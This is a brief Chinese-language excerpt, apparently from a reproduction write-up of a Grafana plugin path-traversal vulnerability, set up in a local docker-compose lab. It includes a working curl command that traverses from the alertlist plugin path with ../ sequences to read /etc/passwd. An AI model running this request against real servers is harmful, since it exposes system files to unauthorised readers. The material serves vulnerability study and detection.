
../ 等特殊字符操纵文件路径。
<grafana_host_url>/public/plugins/<plugin_id>/,其中 <plugin_id> 是已安装插件的 ID。可通过以下资料确认脆弱路径。
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd 可以通过该命令访问到 etc/passwd。
../ 这样的异常路径访问。